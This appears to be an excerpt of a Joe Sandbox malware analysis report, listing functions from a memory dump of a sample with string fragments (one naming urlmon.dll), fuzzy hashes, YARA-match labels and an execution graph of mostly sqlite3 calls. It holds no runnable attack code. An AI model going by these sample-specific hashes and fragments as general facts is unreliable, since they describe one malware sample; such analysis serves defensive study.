                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$@@@>$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                    • API String ID: 0-2725001343
                                                    • Opcode ID: b57b73bea51b39074ec06a376af029af28c8dfb7d058c626f87207a0ef18c9ce
                                                    • Instruction ID: 0083f40d9df40880e7848fc3307fb2257d6e05a510a560792ab3da75fbc32077
                                                    • Opcode Fuzzy Hash: b57b73bea51b39074ec06a376af029af28c8dfb7d058c626f87207a0ef18c9ce
                                                    • Instruction Fuzzy Hash: 9991FEF08052A98ACB118F55A5603DEBF71BB95304F1581E9C6AA7B243C3BE4E45DF90
                                                    Function 028E11B6 Relevance: 34.0, Strings: 27, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                    • API String ID: 0-1002149817
                                                    • Opcode ID: 762b55bfdef1b5cac3a58b4553d928b5278bf160ae5e8c947490bb33cada0853
                                                    • Instruction ID: 5601efbc06f083a9971d92a691621252d9025e723893b72c8fc61c23100add75
                                                    • Opcode Fuzzy Hash: 762b55bfdef1b5cac3a58b4553d928b5278bf160ae5e8c947490bb33cada0853
                                                    • Instruction Fuzzy Hash: 72C12CB5D012689AEF61DFA4CC44BEEBBB9BF05304F0081D9D50DB7241E7B55A888F51
                                                    Function 028D9806 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                    • API String ID: 0-392141074
                                                    • Opcode ID: f5592ea36e1b73460c2af3400111a1440129297e4d67dd22d68f32ca1960f042
                                                    • Instruction ID: b4b14564e0bf4f8181bf9d05c75270cfd4888ea9e0647218540237a62541c0c2
                                                    • Opcode Fuzzy Hash: f5592ea36e1b73460c2af3400111a1440129297e4d67dd22d68f32ca1960f042
                                                    • Instruction Fuzzy Hash: B47122B9D10218AADF25DF94CC40FEEB7BDBF45700F008199E519E6140E7B15B488FA6
                                                    Function 028CD50D Relevance: 13.8, Strings: 11, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                    • API String ID: 0-685823316
                                                    • Opcode ID: ea9f0d6583fa94f6a26edf6def910f1b7846d6c7bae8537b8153bf7c8b801a75
                                                    • Instruction ID: c1bde0ff4411885bc1e5e88c1243d3c65a79ecb0f3f5bf0a024745449a66f745
                                                    • Opcode Fuzzy Hash: ea9f0d6583fa94f6a26edf6def910f1b7846d6c7bae8537b8153bf7c8b801a75
                                                    • Instruction Fuzzy Hash: 2A3184B5D10218AEEF50DFE4CC85BEE7BB9AF09304F10815CE508BA180DBB55508CFA5
                                                    Function 028D4952 Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$P$e$i$m$o$r$x
                                                    • API String ID: 0-620024284
                                                    • Opcode ID: 9a851dbca1f272e6555e8bfade8c9890f660d0f0ac02b761aef69e4f334e867f
                                                    • Instruction ID: efbf95c6c73e204c4abc689e40f4f4c7937285dc2b536e96fdc5c10386bc2151
                                                    • Opcode Fuzzy Hash: 9a851dbca1f272e6555e8bfade8c9890f660d0f0ac02b761aef69e4f334e867f
                                                    • Instruction Fuzzy Hash: 924195B9D00218B6DF14EBA8CC40FDE737EAF55700F408599E509E7141EBB5A7488FA2
                                                    Function 028C5F0D Relevance: 10.0, Strings: 8, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$1$5$7$>$K$N$c
                                                    • API String ID: 0-499563787
                                                    • Opcode ID: edefe52c81cbfbe7242540a2452c86e49c497b63c8ea29f0aec6d05dc20a8b52
                                                    • Instruction ID: 07cddd23703980a643b96cf018a3eac6f82641206702bc22ab5926de11d107e1
                                                    • Opcode Fuzzy Hash: edefe52c81cbfbe7242540a2452c86e49c497b63c8ea29f0aec6d05dc20a8b52
                                                    • Instruction Fuzzy Hash: 9B214560C182CEDDDF16C7B884143AEBF715F16224F4882C9D4A56B6C2C3794346C7A6
                                                    Function 028C5F26 Relevance: 10.0, Strings: 8, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$1$5$7$>$K$N$c
                                                    • API String ID: 0-499563787
                                                    • Opcode ID: 1599ac612249c3b82d0cfdd5b03d4d0fd739988c5b486cbd554a231284cf0f15
                                                    • Instruction ID: 1c111031cf49cf6d63310325ca1268f52a3b9744a0fc83ce1aed570ef0194d4a
                                                    • Opcode Fuzzy Hash: 1599ac612249c3b82d0cfdd5b03d4d0fd739988c5b486cbd554a231284cf0f15
                                                    • Instruction Fuzzy Hash: 4211ED20C187CEDDDB12C7BC84147AEBF715F22224F5882D9D4E16B2C2C2B94346D7A6
                                                    Function 028E1A16 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L$S$\$a$c$e$l
                                                    • API String ID: 0-3322591375
                                                    • Opcode ID: b08e4c97453deff5f5468e5cdf134a0c667698d9a8a312199196c6968b9b6f39
                                                    • Instruction ID: b87ddbca26fa3319198a9d9ef937d50bc513fef03975750bc4935020a3035838
                                                    • Opcode Fuzzy Hash: b08e4c97453deff5f5468e5cdf134a0c667698d9a8a312199196c6968b9b6f39
                                                    • Instruction Fuzzy Hash: D14197BAC04218AACF10DFA9DC88FEEB7F9AF49314F01425AD90DE7100E77159448F91
                                                    Function 028D95D1 Relevance: 7.7, Strings: 6, Instructions: 172COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: F$P$T$f$r$x
                                                    • API String ID: 0-2523166886
                                                    • Opcode ID: 85f0c21b55d3cd7e889910d77c03f5302d3020ebfb6540f7692bd27845cb30fe
                                                    • Instruction ID: 56c9c0c5d868db60e701f7a3a7c6d2b42e19025153698e9bd5f5f8c2bb859608
                                                    • Opcode Fuzzy Hash: 85f0c21b55d3cd7e889910d77c03f5302d3020ebfb6540f7692bd27845cb30fe
                                                    • Instruction Fuzzy Hash: AE51C479900308EAEB34DF69CC84BABB7F9AF05744F00495DE449E7180E7B5A548CFA2
                                                    Function 028D8CF6 Relevance: 6.4, Strings: 5, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $i$l$o$u
                                                    • API String ID: 0-2051669658
                                                    • Opcode ID: 263009d4fd032871749c2823011eea3d731ab165f06a26fa8de6f6e197c21ab7
                                                    • Instruction ID: f9ed56c37c828468f281dfd3f420b671bed06208af14618210eb05b116464bbb
                                                    • Opcode Fuzzy Hash: 263009d4fd032871749c2823011eea3d731ab165f06a26fa8de6f6e197c21ab7
                                                    • Instruction Fuzzy Hash: C4616DBA900304AFCB24DBA4DC80FEFB7BDAB48704F104559E51AE7240E735AA45CB61
                                                    Function 028D8984 Relevance: 5.3, Strings: 4, Instructions: 301COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$k$o
                                                    • API String ID: 0-3624523832
                                                    • Opcode ID: ba3eda4db87c56cf67be73ce89b2c1102c39bf96b90c46fabbe96b18817c1320
                                                    • Instruction ID: c2d1e5ed609a3ab189e9dc557775658ef16d0836c368a0bc7e6a55bcffe30a2e
                                                    • Opcode Fuzzy Hash: ba3eda4db87c56cf67be73ce89b2c1102c39bf96b90c46fabbe96b18817c1320
                                                    • Instruction Fuzzy Hash: DDB10CB9A00704AFDB64DBA4CD84FEFB7F9AF88704F108558F619E7240DA74AA45CB50
                                                    Function 028D92AB Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$h$o
                                                    • API String ID: 0-3662636641
                                                    • Opcode ID: 77d57ce3bec96d08f5e496b23ef1ac6229a90d8a96d33e7dded78c818157d057
                                                    • Instruction ID: 88e0656203efde3bcdcad68f41311d1bd41b3f46784547c35edbcbe98beb4541
                                                    • Opcode Fuzzy Hash: 77d57ce3bec96d08f5e496b23ef1ac6229a90d8a96d33e7dded78c818157d057
                                                    • Instruction Fuzzy Hash: 6B8163BAD4021AAADB24DB54CC84FFE737EBF45300F0441A9E509D6141EB746B448FE6
                                                    Function 028D8986 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$k$o
                                                    • API String ID: 0-3624523832
                                                    • Opcode ID: 5df99c7f427bfb34a77af3dc4506e7fe0abd84bb587af41a3e6f28700aad92d4
                                                    • Instruction ID: 3fd5c7e57f9335bbe7e6e2e660b6507a17d124df7bda3388c42d4131e7b67321
                                                    • Opcode Fuzzy Hash: 5df99c7f427bfb34a77af3dc4506e7fe0abd84bb587af41a3e6f28700aad92d4
                                                    • Instruction Fuzzy Hash: E4611CB9A00308AFDB54DFA4CD84FEFB7B9AF88704F108558E619E7244DB70AA45CB51
                                                    Function 028D8843 Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                    • API String ID: 0-2877786613
                                                    • Opcode ID: b4131b5c88184e84af3c9c2cf1d4b704f133cbd47d7b5e6463356181907bd0c1
                                                    • Instruction ID: 01831ad5adc6aff6568845c4de893545365b5ca83a6e578925b312426abb4427
                                                    • Opcode Fuzzy Hash: b4131b5c88184e84af3c9c2cf1d4b704f133cbd47d7b5e6463356181907bd0c1
                                                    • Instruction Fuzzy Hash: B0414F79911159BBEB11EF99CD41FFF773DAF46B00F004049FA05AA180EBB466058BA7
                                                    Function 028D8846 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                    • API String ID: 0-2877786613
                                                    • Opcode ID: 0533708820d59bf4a9ba6803206e714817d5a547856e94cfb6e13f0aec0cc2fe
                                                    • Instruction ID: 92e651b4b71a06a9ca4f2805d4a3cfaebc89e6054c667cba349b7424b1fcf4ae
                                                    • Opcode Fuzzy Hash: 0533708820d59bf4a9ba6803206e714817d5a547856e94cfb6e13f0aec0cc2fe
                                                    • Instruction Fuzzy Hash: 5E316079911159BBEB11EF99CD41FEF773D9F46B00F004049FA05AA180EBF466058BA7
                                                    Function 028D92B6 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$h$o
                                                    • API String ID: 0-3662636641
                                                    • Opcode ID: 2b37322fd9b564222686f8aa10bac071f055c82fde4f46e69bad094e7c1782d7
                                                    • Instruction ID: 70a36d6343c8e12b0c647135fa9ac04dcd48719aff6e9a8cd7f4934d0d8352a5
                                                    • Opcode Fuzzy Hash: 2b37322fd9b564222686f8aa10bac071f055c82fde4f46e69bad094e7c1782d7
                                                    • Instruction Fuzzy Hash: A44123B9D4421AAADF14EB65CD40FFE73BABF44300F0045A9D509E6141EB746B448FE6
                                                    Function 028D4B36 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2$9$A$J
                                                    • API String ID: 0-2876596324
                                                    • Opcode ID: b0c14ff0db7df03014d2aa6372da491d802255bf85755ed6d95de23e0cc6ac87
                                                    • Instruction ID: 7a09eeab25fcdecd21bb1c146a6f7cb36b751c8e57f704403a62233ce1b5fd05
                                                    • Opcode Fuzzy Hash: b0c14ff0db7df03014d2aa6372da491d802255bf85755ed6d95de23e0cc6ac87
                                                    • Instruction Fuzzy Hash: 4D3143B9910119ABEF04DBA8DD41FEE73BDEF45304F004199E909E6240E7B5AA048BE6
                                                    Function 028C2556 Relevance: 5.0, Strings: 4, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: J$ds$q;wz$q;wzds
                                                    • API String ID: 0-4046768835
                                                    • Opcode ID: 90700c656e26afb4d9119813a556d5865635e0eb11844fa6baf0a415b96b8e32
                                                    • Instruction ID: 86eea27e9616e805b74c4b9cdd49de0d75c76c57e34e7adee2fd4500cf08f0bd
                                                    • Opcode Fuzzy Hash: 90700c656e26afb4d9119813a556d5865635e0eb11844fa6baf0a415b96b8e32
                                                    • Instruction Fuzzy Hash: F6E092B4C0024CAACB05EFEAD802AAEBB78EB01600F604ED9C914DB245D774C6048B86

                                                    Execution Graph

                                                    Execution Coverage:1.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0.2%
                                                    Total number of Nodes:502
                                                    Total number of Limit Nodes:64
                                                    execution_graph 28647 61e2eec3 28648 61e2eef2 28647->28648 28650 61e2eedc 28647->28650 28649 61e29ed5 9 API calls 28649->28650 28650->28648 28650->28649 28652 61e29e2f 9 API calls 28650->28652 28653 61e2ed95 15 API calls 28650->28653 28654 61e2f1e5 28650->28654 28655 61e2f0c7 28650->28655 28656 61e2f22c 28650->28656 28652->28650 28653->28650 28654->28655 28658 61e2f1f5 28654->28658 28667 61e29a7c 9 API calls 28655->28667 28656->28648 28656->28655 28665 61e2f258 28656->28665 28658->28648 28673 61e29a7c 9 API calls 28658->28673 28659 61e2f31b 28668 61e29a7c 9 API calls 28659->28668 28664 61e11993 sqlite3_free sqlite3_free 28664->28665 28665->28648 28665->28658 28665->28659 28665->28664 28669 61e13ad1 7 API calls 28665->28669 28670 61e29e2f 9 API calls 28665->28670 28671 61e2eabf 15 API calls 28665->28671 28672 61e10cea 6 API calls 28665->28672 28667->28648 28668->28648 28669->28665 28670->28665 28671->28665 28672->28665 28673->28648 28674 61e896f1 sqlite3_initialize 28675 61e8970f 28674->28675 28676 61e89780 28674->28676 28682 61e1ffd7 10 API calls 28675->28682 28678 61e8975d 28793 61e16425 sqlite3_free sqlite3_free 28678->28793 28679 61e8973a 28679->28678 28683 61e889f2 sqlite3_initialize 28679->28683 28682->28679 28684 61e896b6 28683->28684 28685 61e88a25 28683->28685 28684->28678 28794 61e123e5 28685->28794 28687 61e89660 28689 61e89662 sqlite3_errcode 28687->28689 28688 61e88aa7 sqlite3_mutex_enter 28797 61e29798 28688->28797 28692 61e8967d 28689->28692 28693 61e89671 sqlite3_close 28689->28693 28690 61e88a7b 28690->28687 28690->28688 28696 61e88a9a sqlite3_free 28690->28696 28694 61e89688 sqlite3_free 28692->28694 28693->28694 28694->28684 28695 61e88b94 28697 61e29798 15 API calls 28695->28697 28696->28687 28698 61e88bbc 28697->28698 28699 61e29798 15 API calls 28698->28699 28700 61e88be4 28699->28700 28701 61e29798 15 API calls 28700->28701 28702 61e88c0c 28701->28702 28703 61e29798 15 API calls 28702->28703 28704 61e88c34 28703->28704 28705 61e8969f sqlite3_mutex_leave 28704->28705 28806 61e12144 28704->28806 28705->28689 28708 61e88c78 28893 61e357c2 13 API calls 28708->28893 28709 61e88c6c 28892 61e260ed sqlite3_log 28709->28892 28712 61e88c76 28713 61e88c9d 28712->28713 28714 61e88cdf 28712->28714 28894 61e2926c 11 API calls 28713->28894 28812 61e43e5d 28714->28812 28718 61e88ccf sqlite3_free 28718->28705 28719 61e88d0a 28719->28705 28721 61e88d30 28883 61e1525d 28721->28883 28723 61e88d3d 28724 61e1525d 3 API calls 28723->28724 28725 61e88d66 28724->28725 28725->28705 28726 61e88d9e sqlite3_overload_function 28725->28726 28727 61e88dbb 28726->28727 28728 61e88dc2 sqlite3_errcode 28726->28728 28727->28728 28729 61e88dd6 28728->28729 28769 61e890e5 28728->28769 28731 61e893de 28729->28731 28732 61e88dde sqlite3_malloc 28729->28732 28730 61e89108 28730->28731 28736 61e891bc sqlite3_create_module 28730->28736 28738 61e893f0 sqlite3_create_function 28731->28738 28745 61e894c6 28731->28745 28732->28731 28734 61e88df8 28732->28734 28733 61e890f6 sqlite3_errcode 28733->28705 28733->28730 28895 61e26269 14 API calls 28734->28895 28736->28731 28740 61e891e6 sqlite3_malloc 28736->28740 28737 61e895b8 28743 61e895e3 sqlite3_wal_autocheckpoint 28737->28743 28887 61e113ca 28737->28887 28741 61e8943a sqlite3_create_function 28738->28741 28738->28745 28739 61e88e43 28739->28730 28742 61e88e4d sqlite3_create_function 28739->28742 28744 61e89201 28740->28744 28740->28745 28741->28745 28747 61e89480 28741->28747 28742->28730 28748 61e88e97 sqlite3_create_function 28742->28748 28743->28705 28898 61e1a4a1 8 API calls 28744->28898 28745->28737 28751 61e8952e 28745->28751 28755 61e894ea sqlite3_create_function 28745->28755 28746 61e8911e sqlite3_mutex_enter 28746->28769 28902 61e26269 14 API calls 28747->28902 28748->28730 28753 61e88edd sqlite3_create_function 28748->28753 28761 61e89582 28751->28761 28763 61e8953e sqlite3_create_function 28751->28763 28753->28730 28758 61e88f27 28753->28758 28754 61e8923a 28759 61e89641 28754->28759 28899 61e1a4a1 8 API calls 28754->28899 28755->28745 28756 61e89143 sqlite3_mutex_leave 28760 61e89191 sqlite3_free 28756->28760 28756->28769 28757 61e894a0 28757->28745 28903 61e26269 14 API calls 28757->28903 28768 61e88f41 sqlite3_create_function 28758->28768 28778 61e88f85 28758->28778 28905 61e09d7b sqlite3_free sqlite3_free sqlite3_free 28759->28905 28764 61e891a5 28760->28764 28760->28769 28761->28737 28771 61e8958d sqlite3_create_module 28761->28771 28763->28751 28764->28733 28766 61e8925a 28766->28759 28900 61e1a4a1 8 API calls 28766->28900 28768->28758 28769->28730 28769->28733 28769->28746 28769->28756 28769->28760 28897 61e2926c 11 API calls 28769->28897 28770 61e89650 sqlite3_free 28770->28731 28771->28761 28774 61e8927a 28774->28759 28775 61e89282 sqlite3_create_function 28774->28775 28775->28759 28776 61e892c8 sqlite3_create_function 28775->28776 28776->28759 28777 61e8930e sqlite3_overload_function 28776->28777 28777->28759 28779 61e89330 sqlite3_overload_function 28777->28779 28778->28730 28896 61e26269 14 API calls 28778->28896 28779->28759 28780 61e89352 sqlite3_overload_function 28779->28780 28780->28759 28782 61e89374 sqlite3_overload_function 28780->28782 28782->28759 28784 61e89396 sqlite3_overload_function 28782->28784 28783 61e89051 28783->28730 28785 61e8905b sqlite3_create_function 28783->28785 28784->28759 28786 61e893b8 28784->28786 28785->28731 28787 61e890a4 sqlite3_create_function 28785->28787 28901 61e26269 14 API calls 28786->28901 28787->28769 28789 61e893d4 28789->28731 28904 61e26269 14 API calls 28789->28904 28791 61e89614 28791->28731 28792 61e8961e sqlite3_create_module 28791->28792 28792->28731 28793->28676 28906 61e0fff3 28794->28906 28798 61e297cf 28797->28798 28799 61e12144 11 API calls 28798->28799 28800 61e297f8 28799->28800 28803 61e2985c 28800->28803 28805 61e297fe 28800->28805 28801 61e12144 11 API calls 28802 61e29811 28801->28802 28802->28695 28920 61e2926c 11 API calls 28803->28920 28805->28801 28807 61e121d2 28806->28807 28808 61e12157 28806->28808 28807->28708 28807->28709 28808->28807 28921 61e114d9 10 API calls 28808->28921 28810 61e121bc 28810->28807 28922 61e0f5d9 sqlite3_free 28810->28922 28813 61e43e7f strcmp 28812->28813 28814 61e43ea9 28812->28814 28813->28814 28843 61e441c5 28813->28843 28815 61e123e5 6 API calls 28814->28815 28814->28843 28824 61e43f09 28815->28824 28816 61e123e5 6 API calls 28817 61e44392 28816->28817 28819 61e44398 28817->28819 28820 61e443aa 28817->28820 28818 61e44b18 28818->28719 28874 61e1318f 28818->28874 28942 61e0f5d9 sqlite3_free 28819->28942 28822 61e444b1 28820->28822 28943 61e0f5d9 sqlite3_free 28820->28943 28846 61e4457a 28822->28846 28923 61e0161c 28822->28923 28823 61e123e5 6 API calls 28833 61e44161 28823->28833 28824->28818 28830 61e0fff3 6 API calls 28824->28830 28856 61e44149 28824->28856 28828 61e449b3 sqlite3_free sqlite3_free 28869 61e4496a 28828->28869 28829 61e443a5 28829->28828 28945 61e43d77 89 API calls 28829->28945 28832 61e43f9c 28830->28832 28836 61e43fc4 28832->28836 28837 61e43fb2 sqlite3_free 28832->28837 28835 61e449ae 28833->28835 28842 61e0fff3 6 API calls 28833->28842 28833->28843 28834 61e44a0e sqlite3_mutex_leave 28834->28818 28835->28828 28839 61e43fcd 28836->28839 28847 61e43ffe sqlite3_free sqlite3_free 28836->28847 28837->28818 28838 61e445dd 28851 61e44305 28838->28851 28944 61e0a964 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 28838->28944 28848 61e4402f sqlite3_mutex_enter 28839->28848 28840 61e44551 sqlite3_uri_boolean 28845 61e44580 sqlite3_uri_boolean 28840->28845 28840->28846 28866 61e4422d 28842->28866 28843->28816 28843->28829 28844 61e4467e sqlite3_free 28844->28851 28845->28846 28926 61e13fdf 28846->28926 28847->28818 28938 61e01718 28848->28938 28850 61e44506 28850->28838 28850->28840 28851->28829 28858 61e447a4 28851->28858 28935 61e014e3 28851->28935 28853 61e44056 28854 61e4412c sqlite3_mutex_leave sqlite3_free 28853->28854 28855 61e44069 strcmp 28853->28855 28863 61e44099 28853->28863 28854->28856 28872 61e448c4 28854->28872 28855->28853 28856->28823 28858->28829 28861 61e13fdf 15 API calls 28858->28861 28873 61e44a77 28858->28873 28859 61e1318f 3 API calls 28859->28869 28860 61e4410a 28860->28854 28865 61e44889 28861->28865 28862 61e442f8 28941 61e0f5d9 sqlite3_free 28862->28941 28863->28860 28864 61e440ce sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 28863->28864 28864->28818 28865->28829 28865->28872 28865->28873 28866->28829 28866->28843 28866->28862 28940 61e28a17 sqlite3_log 28866->28940 28869->28818 28869->28834 28870 61e442e6 28870->28843 28870->28862 28871 61e44aba sqlite3_mutex_enter sqlite3_mutex_leave 28871->28873 28872->28859 28873->28829 28873->28871 28875 61e131a7 28874->28875 28876 61e13198 28874->28876 28875->28721 28876->28875 28877 61e1311c sqlite3_mutex_try 28876->28877 28878 61e13138 28877->28878 28879 61e13146 28877->28879 28878->28721 28880 61e1316c sqlite3_mutex_enter 28879->28880 29012 61e02c59 sqlite3_mutex_leave 28879->29012 28881 61e1315f 28880->28881 28881->28878 28881->28880 28884 61e15278 28883->28884 28885 61e1526c 28883->28885 28884->28723 28886 61e1318f 3 API calls 28885->28886 28886->28884 28888 61e113e6 sqlite3_free 28887->28888 28889 61e113f4 28887->28889 28888->28889 28890 61e0fff3 6 API calls 28889->28890 28891 61e11423 28889->28891 28890->28891 28891->28743 28892->28712 28893->28712 28894->28718 28895->28739 28896->28783 28897->28760 28898->28754 28899->28766 28900->28774 28901->28789 28902->28757 28903->28745 28904->28791 28905->28770 28907 61e1000f 28906->28907 28908 61e100e3 28906->28908 28907->28908 28909 61e1002a sqlite3_mutex_enter 28907->28909 28908->28690 28913 61e10040 28909->28913 28910 61e10097 28916 61e273a9 malloc 28910->28916 28911 61e100ac 28912 61e100d2 sqlite3_mutex_leave 28911->28912 28912->28908 28913->28910 28919 61e09aba sqlite3_mutex_leave sqlite3_mutex_enter 28913->28919 28917 61e273c2 28916->28917 28918 61e273cf sqlite3_log 28916->28918 28917->28911 28918->28917 28919->28910 28920->28802 28921->28810 28922->28807 28946 61e3920b 28923->28946 28929 61e13ff6 28926->28929 28927 61e140ad 28927->28838 28929->28927 28930 61e14057 